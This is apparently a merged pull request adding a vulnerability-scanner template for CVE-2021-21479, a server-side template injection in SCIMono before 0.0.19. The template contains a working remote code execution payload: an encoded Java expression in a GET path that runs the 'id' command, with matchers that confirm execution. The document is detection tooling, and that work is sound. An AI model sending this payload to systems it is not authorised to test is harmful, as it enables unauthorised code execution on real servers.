Merge pull request #2076 from dwisiswant0/GHSL-2020-227

Server-Side Template Injection leading to unauthenticated Remote Code Execution in SCIMono - CVE-2021-21479

cves/2021/CVE-2021-21479.yaml

@@ -0,0 +1,26 @@
+id: CVE-2021-21479
+
+info:
+  name: SCIMono < v0.0.19 Remote Code Execution
+  author: dwisiswant0
+  severity: critical
+  reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
+  description: |
+    In SCIMono before 0.0.19, it is possible for an attacker to inject and
+    execute java expression compromising the availability and integrity of the system.
+  tags: cve,cve2021,scim,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
+
+    matchers:
+      - type: word
+        words:
+          - "The attribute value"
+          - "java.lang.UNIXProcess@"
+          - "has invalid value!"
+          - '"status" : "400"'
+        part: body
+        condition: and